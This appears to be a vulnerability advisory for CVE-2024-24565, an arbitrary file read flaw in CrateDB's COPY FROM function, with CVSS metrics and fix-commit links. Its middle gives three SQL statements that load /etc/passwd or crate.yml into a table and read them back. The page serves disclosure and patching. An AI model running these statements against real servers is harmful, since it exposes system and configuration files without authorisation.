CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
92.4%
There is an arbitrary file read vulnerability in the CrateDB database, and authenticated CrateDB database users can read any file on the system.
There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
CREATE TABLE info_leak(info_leak STRING);
COPY info_leak FROM '/etc/passwd' with (format='csv', header=false); or COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);
SELECT * FROM info_leak;
This vulnerability affects all current versions of the CrateDB database. Attackers who exploit this vulnerability to obtain sensitive information may carry out further attacks, while also affecting CrateDB Cloud Clusters.
github.com/advisories/GHSA-475g-vj6c-xf96
github.com/crate/crate/commit/32d0fc2ebb834ea324eb7ab5d01320a67bc5c3c7
github.com/crate/crate/commit/4e857d675683095945dd524d6ba03e692c70ecd6
github.com/crate/crate/commit/b75aeeabf90f51bd96ddb499903928fd10185207
github.com/crate/crate/commit/c4c97d5a1c52cc2250ea42d062a3d37550c19dd5
github.com/crate/crate/commit/c5034323f1b56ca5d04b8ef4c6029eb63a5ba172
github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96
nvd.nist.gov/vuln/detail/CVE-2024-24565
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
92.4%